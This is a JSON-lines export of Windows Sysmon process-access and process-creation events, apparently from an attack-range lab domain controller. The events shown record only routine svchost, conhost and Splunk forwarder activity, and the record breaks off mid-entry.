{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5783,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.909\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.909","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5784,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.909\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.909","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5785,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.909\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-036E-5F25-0000-001017DD0A00}\r\nTargetProcessId: 5028\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.909","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-036E-5F25-0000-001017DD0A00}","TargetProcessId":"5028","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5786,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:51.049\r\nSourceProcessGUID: {A837DB8D-036E-5F25-0000-001017DD0A00}\r\nSourceProcessId: 5028\r\nSourceThreadId: 4868\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:51.049","SourceProcessGUID":"{A837DB8D-036E-5F25-0000-001017DD0A00}","SourceProcessId":"5028","SourceThreadId":"4868","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5787,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:51.644\r\nProcessGuid: {A837DB8D-036F-5F25-0000-0010FBDE0A00}\r\nProcessId: 2284\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:53:51.644","ProcessGuid":"{A837DB8D-036F-5F25-0000-0010FBDE0A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:53:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5788,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:51.643\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-036F-5F25-0000-0010FBDE0A00}\r\nTargetProcessId: 2284\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:51.643","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-036F-5F25-0000-0010FBDE0A00}","TargetProcessId":"2284","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5789,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:51.643\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-036F-5F25-0000-0010FBDE0A00}\r\nTargetProcessId: 2284\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:51.643","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-036F-5F25-0000-0010FBDE0A00}","TargetProcessId":"2284","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:53:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5790,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:51.643\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:51.643","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5791,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:51.643\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:51.643","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\